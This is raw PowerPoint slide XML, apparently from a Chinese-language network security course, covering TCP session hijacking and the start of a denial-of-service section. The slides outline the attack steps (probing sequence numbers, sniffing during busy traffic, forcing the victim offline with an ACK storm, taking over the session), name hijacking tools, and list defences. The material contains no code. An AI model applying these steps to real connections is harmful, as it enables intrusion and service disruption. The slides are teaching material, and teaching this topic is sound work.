          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5219700" y="3500438"/>
            <a:ext cx="1944688" cy="792162"/>
            <a:chOff x="3288" y="2205"/>
            <a:chExt cx="1225" cy="499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260116" name="Line 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3334" y="2205"/>
              <a:ext cx="1179" cy="499"/>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260117" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="-1140646">
              <a:off x="3288" y="2251"/>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3 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>劫持会话</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="260122" name="Group 26"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2339975" y="3429000"/>
            <a:ext cx="1728788" cy="792163"/>
            <a:chOff x="1474" y="2160"/>
            <a:chExt cx="1089" cy="499"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260118" name="Line 22"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1474" y="2160"/>
              <a:ext cx="907" cy="499"/>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260119" name="Text Box 23"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="1613427">
              <a:off x="1519" y="2205"/>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4 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>迫使</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                  <a:latin typeface="Times New Roman" charset="0"/>
                </a:rPr>
                <a:t>下线</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="87893551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0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395536" y="404664"/>
            <a:ext cx="7793037" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话劫持的原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="261123" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251520" y="1484784"/>
            <a:ext cx="4320480" cy="4752528"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>连接（会话）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>建立：三次握手</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>终止：正常情况四次握手</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话状态</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话标识：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>源</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+SN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>—— </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目标</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>SN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" baseline="-25000" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>成功劫持</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>会话关键：猜测序列号</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="261124" name="Object 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4644008" y="1539849"/>
          <a:ext cx="4300478" cy="4553447"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s661614" name="位图图像" r:id="rId4" imgW="3561905" imgH="3772427" progId="PBrush">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="位图图像" r:id="rId4" imgW="3561905" imgH="3772427" progId="PBrush">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name="Picture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539849"/>
                        <a:ext cx="4300478" cy="4553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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{60E3BDA2-EE3A-4650-955D-7B8A6C331119}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>151</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4857994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1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1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11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1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7" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发现目标</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>探查远程机器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ISN(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>初始序列号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>规律</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>等待或者监听会话</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>最好在流量高峰期间进行，不容易被发现，而且可以有比较多可供选择的会话</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>猜测序列号</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使被劫持方下线</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>风暴，拒绝服务</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>接管会话</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果在同一个子网中，则可以收到响应，否则要猜测服务器的动作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272386" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>实施会话劫持的一般性过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4276725" y="6408738"/>
            <a:ext cx="511175" cy="449262"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{5F730482-8678-48AE-89B7-744C9F0441DD}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>152</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8092251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2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23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238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238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7238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238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72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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Juggernaut</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>可以进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话攻击的网络</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>sniffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>程序</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Hunt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US"/>
              <a:t>功能与</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"/>
              <a:t>Juggernaut</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US"/>
              <a:t>类似</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"/>
              <a:t>TTY Watcher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US"/>
              <a:t>免费程序，针对单一主机上的连接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN"/>
              <a:t>IP Watcher</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US"/>
              <a:t>商用的会话劫持工具</a:t>
            </a:r>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88C370E1-BA90-457C-AFE1-7F0901A18E82}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>153</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273410" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>进行会话劫持的工具</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3004782913"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>
  </p:transition>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9" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>用交换机代替集线器</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>会话加密</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>防火墙配置</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>限制尽可能少量的外部许可连接的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>检测</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ACK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包的数量明显增加</a:t>
            </a:r>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F489D619-4F5E-4619-B999-2F3DA2B11CB5}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:pPr/>
              <a:t>154</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270338" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如何防止会话劫持</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32080254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033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03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03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7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拒绝服务攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="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33DFCE93-5EF1-41EA-92FC-E50C40EC102F}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>155</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3691877607"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:pull/>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a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>拒绝服务攻击</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911" y="3706912"/>
            <a:ext cx="3170378" cy="2314376"/>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4007300"/>
            <a:ext cx="1905060" cy="1941980"/>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闪电形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1563688" y="2962275"/>
            <a:ext cx="484187"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闪电形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3125788" y="3022600"/>
            <a:ext cx="485775"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a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2197100" y="2986088"/>
            <a:ext cx="504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200" b="1"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="闪电形 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="6978828">
            <a:off x="5168901" y="4213225"/>
            <a:ext cx="609600" cy="1228725"/>
          </a:xfrm>
          <a:prstGeom prst="lightningBol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9141" y="1421223"/>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3318" y="1285655"/>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580" y="1141639"/>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云形标注 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6948488" y="2068513"/>
            <a:ext cx="1544637" cy="1512887"/>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chemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>怎么打不通呢</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>？？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763689" y="5085184"/>
            <a:ext cx="6192688" cy="9361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a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>呼死你！！！</a:t>
            </a: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156</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31021894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p:bldP spid="16" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>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normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击者通过某种手段，导致目标机器或网络停止向合法用户提供正常服务或资源访问。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>利用网络协议漏洞或其他系统及应用软件的漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>耗尽被攻击的计算机或网络的资源，使其无法正常提供服务，直至系统停止响应甚至崩溃。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：攻击可用性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>目的：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>破坏组织正常运行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使服务器崩溃</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使网络功能失效</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使某个服务器瘫痪，以方便黑客冒充；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>强制服务器重启，以便于黑客启动木马程序。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="288770" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>拒绝服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(Denial of Service)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67587" name="灯片编号占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BC1593B0-D709-4625-B1DF-86D6EEB138D3}" type="slidenum">
